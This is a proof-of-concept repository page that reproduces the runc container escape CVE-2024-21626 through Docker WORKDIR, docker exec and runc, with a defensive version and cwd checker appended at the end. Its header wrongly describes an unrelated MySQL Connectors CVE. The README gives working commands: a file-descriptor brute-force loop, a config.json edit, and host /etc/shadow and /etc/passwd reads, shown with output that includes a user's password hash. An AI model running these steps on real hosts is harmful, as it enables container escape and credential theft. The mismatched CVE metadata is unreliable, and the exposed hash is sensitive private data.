Associated Vulnerability
Title: Oracle MySQL security vulnerability (CVE-2024-21262)
Description: Oracle MySQL is an open-source relational database management system from the US company Oracle. MySQL Connectors is the driver within it for applications that connect to MySQL. MySQL Connectors 9.0.0 and earlier versions of Oracle MySQL contain a security vulnerability. An attacker can exploit this vulnerability to update, insert or delete accessible data.
Description
Three different reproductions: WORKDIR, EXEC & RUNC.
Readme
# RECORDS
Only for reproduction of CVEs.
Related Resources:
- [LINK](https://nitroc.org/en/posts/cve-2024-21626-illustrated/?utm_source=chatgpt.com#exploit-via-docker-exec)
- [GITHUB_1](https://github.com/V0WKeep3r/CVE-2024-21626-runcPOC#)
- [GITHUB_2](https://github.com/cdxiaodong/CVE-2024-21626)
- [ISSUE](https://github.com/NitroCao/CVE-2024-21626/issues/1)
----
## Check Envs
Download docker-24.0.6.tgz from https://download.docker.com/linux/static/stable/x86_64/.
```shell
sudo mkdir -p /usr/local/docker-24.0.6
sudo tar -xzf docker-24.0.6.tgz -C /usr/local/docker-24.0.6
sudo ln -sf /usr/local/docker-24.0.6/docker/* /usr/local/bin/
sudo ln -sf /usr/local/docker-24.0.6/docker/docker /usr/local/bin/docker
runc --version
docker --version
containerd --version
```
Expected result:
Docker version X <= 24.0.6 installed together with runc version Y <= 1.1.9.
```shell
runc version 1.1.9
commit: v1.1.9-0-gccaecfc
spec: 1.0.2-dev
go: go1.20.7
libseccomp: 2.5.1
Docker version 24.0.6, build ed223bc
containerd github.com/containerd/containerd v1.7.3 7880925980b188f4c97b462f709d0db8e8962aff
```
My Environment:
- Ubuntu 20.04
- Docker 24.0.6
- runc 1.1.9
- containerd 1.7.3
## SET daemon.json
```shell
sudo gedit /etc/docker/daemon.json
```
Add this:
```json
{
"registry-mirrors": [
"https://docker.imgdb.de",
"https://docker.xuanyuan.me",
"https://doublezonline.cloud",
"https://docker.wanpeng.top"
]
}
```
System (Debian package) install:
```shell
systemctl daemon-reload
systemctl restart docker
```
Static tgz install (temporary; repeat after each reset):
```shell
sudo pkill dockerd 2>/dev/null || true
sudo dockerd &
```
New terminal:
```shell
docker version
docker run hello-world
```
## ADD USER
```shell
sudo usermod -aG docker $USER
newgrp docker
id
```
## WORKDIR
The right `fd/?` index can be found with the bomb loop:
```shell
#!/bin/bash
for i in {3..10} ; do
docker run -w /proc/1/fd/$i ubuntu cat ../../../../../etc/passwd
done
```
```shell
docker run -w /proc/1/fd/9 ubuntu:latest cat ../../../../../etc/passwd
# if it fails, use:
# docker run -w /proc/self/fd/9 ubuntu:latest cat ../../../../../etc/shadow
# docker run -w /proc/self/fd/9 ubuntu:latest cat ../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
syslog:x:104:110::/home/syslog:/usr/sbin/nologin
_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
uuidd:x:107:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:108:115::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:109:116:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:110:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:111:117:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
cups-pk-helper:x:113:120:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
avahi:x:115:121:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:117:123::/var/lib/saned:/usr/sbin/nologin
nm-openvpn:x:118:124:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
hplip:x:119:7:HPLIP system user,,,:/run/hplip:/bin/false
whoopsie:x:120:125::/nonexistent:/bin/false
colord:x:121:126:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
fwupd-refresh:x:122:127:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
geoclue:x:123:128::/var/lib/geoclue:/usr/sbin/nologin
pulse:x:124:129:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
gnome-initial-setup:x:125:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:126:131:Gnome Display Manager:/var/lib/gdm3:/bin/false
sssd:x:127:132:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
puppy:x:1000:1000:puppy,,,:/home/puppy:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
```
## EXEC
Shell inside the container:
```shell
# terminal 1: start the container
docker run --name test_book --rm -it debian:bookworm
# inside the container, create the symlink; fd 8 failed, fd 7 succeeded
# ln -sf /proc/self/fd/8 /bar   (failure)
ln -sf /proc/self/fd/7 /test
# terminal 2: exec into the container with the symlink as working directory
docker exec -it -w /bar test_book sleep 1200
# fds 3, 6, 9 -> unknown
# fds 1, 2, 4, 5, 8 -> do not exist
# fd 7 -> success, no output
# back in terminal 1
ls -F /proc
# pick the newest pid as your candidate
cat /proc/id/cmdline
# (try each pid until the cmdline shows: sleep1200)
# here it was: cat /proc/184/cmdline
ls -al /proc/id/cwd/../../../../home
ls -al /proc/184/cwd/../../../../home
# success
total 12
drwxr-xr-x 3 root root 4096 Mar 25 2025 .
drwxr-xr-x 20 root root 4096 Mar 25 2025 ..
drwxr-xr-x 20 1000 1000 4096 Oct 8 08:56 puppy
# enter the user's home directory
ls -al /proc/184/cwd/../../../../home/puppy
# success
total 108
drwxr-xr-x 20 1000 1000 4096 Oct 8 08:56 .
drwxr-xr-x 3 root root 4096 Mar 25 2025 ..
-rw------- 1 1000 1000 10382 Oct 10 06:49 .bash_history
-rw-r--r-- 1 1000 1000 220 Mar 25 2025 .bash_logout
-rw-r--r-- 1 1000 1000 3771 Mar 25 2025 .bashrc
drwx------ 16 1000 1000 4096 Oct 8 11:05 .cache
drwx------ 14 1000 1000 4096 Oct 7 13:40 .config
drwx------ 3 1000 1000 4096 Mar 25 2025 .gnupg
drwx------ 5 1000 1000 4096 Oct 8 11:14 .local
drwx------ 4 1000 1000 4096 Mar 27 2025 .mozilla
-rw-r--r-- 1 1000 1000 367 Mar 27 2025 .pam_environment
drwx------ 3 1000 1000 4096 Oct 7 13:40 .pki
-rw-r--r-- 1 1000 1000 807 Mar 25 2025 .profile
drwx------ 2 1000 1000 4096 Oct 8 08:56 .ssh
-rw-r--r-- 1 1000 1000 0 Mar 27 2025 .sudo_as_admin_successful
drwxrwxr-x 4 1000 1000 4096 Oct 7 13:40 .vscode
drwxrwxr-x 8 1000 1000 4096 Oct 8 14:30 Assignments
drwxr-xr-x 2 1000 1000 4096 Mar 25 2025 Desktop
drwxr-xr-x 2 1000 1000 4096 Mar 25 2025 Documents
drwxr-xr-x 2 1000 1000 4096 Mar 27 2025 Downloads
drwxr-xr-x 2 1000 1000 4096 Mar 25 2025 Music
drwxr-xr-x 2 1000 1000 4096 Mar 25 2025 Pictures
drwxr-xr-x 2 1000 1000 4096 Mar 25 2025 Public
drwxr-xr-x 2 1000 1000 4096 Mar 25 2025 Templates
drwxr-xr-x 2 1000 1000 4096 Mar 25 2025 Videos
drwx------ 3 1000 1000 4096 Mar 27 2025 snap
cat /proc/id/cwd/../../../../etc/hostname
cat /proc/184/cwd/../../../../etc/hostname
# puppy-virtual-machine   (the host's hostname)
cat /etc/hostname
# prints the current container's own hostname, for comparison
```
-------------------
## RUNC directly
- check runc version:
```shell
runc --version
runc version 1.1.9
commit: v1.1.9-0-gccaecfc
spec: 1.0.2-dev
go: go1.20.7
libseccomp: 2.5.1
```
- Steps:
```shell
docker run --name helper-ctr alpine
# export the container's filesystem as a tar to use as the rootfs
docker export helper-ctr --output alpine.tar
mkdir rootfs
tar xf alpine.tar -C rootfs
# create config.json
runc spec
# in most environments the fd is 7; otherwise find it with the bomb loop
# (runc spec writes "cwd": "/" with a space after the colon, so allow it)
sed -ri 's#("cwd":)\s*"/"#\1 "/proc/self/fd/7"#' config.json
gedit config.json
# if fd 7 does not work (it did not in my environment), set "cwd": "/proc/self/fd/8"
grep cwd config.json
# run with logging
sudo runc --log ./log.json run demo
# a failure like this means the cwd fd is wrong:
runc run failed: unable to start container process: error during container init: mkdir /proc/self/fd/7: no such file or directory
# on success you get a shell as root
whoami
root
# read the host's shadow and passwd
cat ./../../../../../etc/shadow
cat ./../../../../../etc/passwd
# shadow contents:
root:!:20172:0:99999:7:::
daemon:*:19432:0:99999:7:::
bin:*:19432:0:99999:7:::
sys:*:19432:0:99999:7:::
sync:*:19432:0:99999:7:::
games:*:19432:0:99999:7:::
man:*:19432:0:99999:7:::
lp:*:19432:0:99999:7:::
mail:*:19432:0:99999:7:::
news:*:19432:0:99999:7:::
uucp:*:19432:0:99999:7:::
proxy:*:19432:0:99999:7:::
www-data:*:19432:0:99999:7:::
backup:*:19432:0:99999:7:::
list:*:19432:0:99999:7:::
irc:*:19432:0:99999:7:::
gnats:*:19432:0:99999:7:::
nobody:*:19432:0:99999:7:::
systemd-network:*:19432:0:99999:7:::
systemd-resolve:*:19432:0:99999:7:::
systemd-timesync:*:19432:0:99999:7:::
messagebus:*:19432:0:99999:7:::
syslog:*:19432:0:99999:7:::
_apt:*:19432:0:99999:7:::
tss:*:19432:0:99999:7:::
uuidd:*:19432:0:99999:7:::
tcpdump:*:19432:0:99999:7:::
avahi-autoipd:*:19432:0:99999:7:::
usbmux:*:19432:0:99999:7:::
rtkit:*:19432:0:99999:7:::
dnsmasq:*:19432:0:99999:7:::
cups-pk-helper:*:19432:0:99999:7:::
speech-dispatcher:!:19432:0:99999:7:::
avahi:*:19432:0:99999:7:::
kernoops:*:19432:0:99999:7:::
saned:*:19432:0:99999:7:::
nm-openvpn:*:19432:0:99999:7:::
hplip:*:19432:0:99999:7:::
whoopsie:*:19432:0:99999:7:::
colord:*:19432:0:99999:7:::
fwupd-refresh:*:19432:0:99999:7:::
geoclue:*:19432:0:99999:7:::
pulse:*:19432:0:99999:7:::
gnome-initial-setup:*:19432:0:99999:7:::
gdm:*:19432:0:99999:7:::
sssd:*:19432:0:99999:7:::
puppy:$6$n.X.gr9p8dot4UMU$SZvp7KLsk3E/M4Nedom.7R27UzvXi5gqA7Z6z51GFyIl2yehiytV23REPy22XoiF7jBvRdv.uWqs1vnvvGEy30:20172:0:99999:7:::
systemd-coredump:!!:20172::::::
```
**Pay attention to file descriptors: in different environments the value of the `cwd` key is sometimes different, so the bomb scripts need to be run.**
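A defensive check added here, not part of this repository or the linked PoCs: it flags a runc build older than the 1.1.12 release that fixed CVE-2024-21626, and an OCI `config.json` whose `cwd` points into a `/proc/<pid>/fd/` directory, the pattern the WORKDIR and RUNC reproductions above depend on. The function names and the sample config fragment are my own constructions.

```shell
#!/bin/sh
# Added defensive check, not from the PoC repository. runc 1.1.12 is the
# upstream release that fixed CVE-2024-21626; older builds are affected.
FIXED_RUNC="1.1.12"

# version_lt A B -> exit 0 when dotted version A is strictly lower than B
version_lt() {
  awk -v a="$1" -v b="$2" 'BEGIN {
    na = split(a, x, "."); nb = split(b, y, ".")
    n = (na > nb) ? na : nb
    for (i = 1; i <= n; i++) {
      if (x[i] + 0 < y[i] + 0) exit 0
      if (x[i] + 0 > y[i] + 0) exit 1
    }
    exit 1   # equal versions are not "less than"
  }'
}

# runc_affected "<runc --version output>" -> exit 0 when the build is affected
runc_affected() {
  _ver=$(printf '%s\n' "$1" | sed -n 's/^runc version \([0-9][0-9.]*\).*/\1/p' | head -n1)
  [ -n "$_ver" ] && version_lt "$_ver" "$FIXED_RUNC"
}

# path_via_proc_fd PATH -> exit 0 when PATH resolves through /proc/<pid>/fd
# (covers "-w /proc/1/fd/N" and "cwd": "/proc/self/fd/N"; the EXEC variant hides
# the target behind an in-image symlink a string check cannot see, so upgrading runc is the real fix)
path_via_proc_fd() {
  case "$1" in
    /proc/*/fd|/proc/*/fd/*) return 0 ;;
    *) return 1 ;;
  esac
}

# config_cwd_suspicious FILE -> exit 0 when the OCI config's "cwd" is such a path
config_cwd_suspicious() {
  _cwd=$(sed -n 's/^[[:space:]]*"cwd"[[:space:]]*:[[:space:]]*"\([^"]*\)".*/\1/p' "$1" | head -n1)
  path_via_proc_fd "$_cwd"
}

# Demo on constructed inputs: the version string shown in this README and a
# config.json fragment edited the way the RUNC section describes.
SAMPLE_VER="runc version 1.1.9"
runc_affected "$SAMPLE_VER" && echo "affected: $SAMPLE_VER"
SAMPLE_CFG=$(mktemp)
printf '{\n  "process": {\n    "cwd": "/proc/self/fd/7"\n  }\n}\n' > "$SAMPLE_CFG"
config_cwd_suspicious "$SAMPLE_CFG" && echo "suspicious cwd in $SAMPLE_CFG"
rm -f "$SAMPLE_CFG"
```

On a real host, feed `runc --version` output to `runc_affected` and each container bundle's `config.json` to `config_cwd_suspicious`.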
File Snapshot
[4.0K] /data/pocs/ce37b3c598fd8126b3b9b5bf9ac5eacc9821e9ab
├── [ 747] cons.sh
├── [ 173] exec.sh
├── [9.7K] README.md
├── [ 556] runc.sh
└── [ 216] workdir.sh
1 directory, 5 files